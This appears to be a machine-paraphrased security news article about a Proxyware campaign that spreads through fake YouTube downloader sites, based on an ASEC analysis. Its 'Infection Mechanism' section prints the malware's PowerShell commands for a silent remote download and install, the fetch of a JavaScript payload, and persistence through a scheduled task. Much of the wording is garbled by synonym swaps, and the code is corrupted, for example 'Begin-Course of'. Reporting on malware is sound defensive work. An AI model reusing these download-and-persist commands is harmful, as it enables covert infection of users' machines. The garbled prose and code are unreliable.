Cybersecurity researchers have noticed a surge in misleading websites masquerading as YouTube video obtain providers to ship Proxyware malware in current weeks.
Victims searching for to seize movies in MP4 format are redirected by means of advert pages that sporadically current a obtain hyperlink for a seemingly reliable utility known as “WinMemoryCleaner.”
Behind this innocuous facade, nonetheless, lies a multi-stage installer that in the end deploys Proxyware and covertly enslaves the system’s community bandwidth.
The preliminary obtain executable, Setup.exe, unpacks WinMemoryCleaner.exe into the Program Recordsdata listing earlier than triggering an replace script through WinMemoryCleanerUpdate.bat.
As soon as executed, WinMemoryCleaner.exe performs surroundings checks to evade digital machines or sandbox evaluation, then invokes a PowerShell payload that installs Node.js and fetches a malicious JavaScript element from a distant server.
Assault Stream (Supply – ASEC)
ASEC analysts recognized this system as a refined evolution of earlier Proxyware campaigns, noting the attacker’s reliance on GitHub for internet hosting middleman instruments.
Subsequent phases contain the registration of two scheduled duties—“Schedule Replace” and “WindowsDeviceUpdates”—that make sure the JavaScript runs periodically underneath Node.js.
This script communicates primary system info to a command-and-control server and awaits directives, which might embody fetching extra scripts or initiating the ultimate Proxyware set up.
Info Despatched to C&C Server (Supply – ASEC)
ASEC researchers famous that the actor has pivoted from distributing solely DigitalPulse and HoneyGain Proxyware to integrating Infatica’s agent, enhancing bandwidth theft capabilities.
The influence of this marketing campaign is twofold: affected programs expertise degraded community efficiency, and the attacker monetizes the stolen bandwidth by means of affiliate packages.
YouTube Downloader Web page and Malware Obtain Hyperlink (Supply – ASEC)
Proxyware packages sometimes share idle community throughput, promising remuneration to finish customers, however com promise victims unwittingly provide bandwidth with out compensation.
In areas with excessive adoption of streaming providers, resembling South Korea, the marketing campaign’s attain has grown considerably, prompting warnings from main AV distributors.
An infection Mechanism
A deeper examination of the an infection mechanism reveals the pivotal function of the PowerShell script delivered by WinMemoryCleaner.exe.
The script begins with a stealthy set up of Node.js:-
Invoke-WebRequest -Uri ” -OutFile “$env:TEMPnode.msi”
Begin-Course of msiexec.exe -ArgumentList ‘/i’,$env:TEMP + ‘node.msi’,’/qn’ -Wait
As soon as Node.js is in place, the script downloads pas.js from a cloudfront URL and registers it:-
$jsUrl = ”
Invoke-WebRequest -Uri $jsUrl -OutFile “$env:ProgramFilesWinMemoryCleanerp.js”
schtasks /Create /F /SC MINUTE /MO 30 /TN “Schedule Replace” /TR “node $env:ProgramFilesWinMemoryCleanerp.js”
Steady execution of the JavaScript element underneath Node.js allows dynamic updates and last payload deployment, making eradication difficult with out specialised instruments.
Enhance your SOC and assist your crew defend what you are promoting with free top-notch risk intelligence: Request TI Lookup Premium Trial.
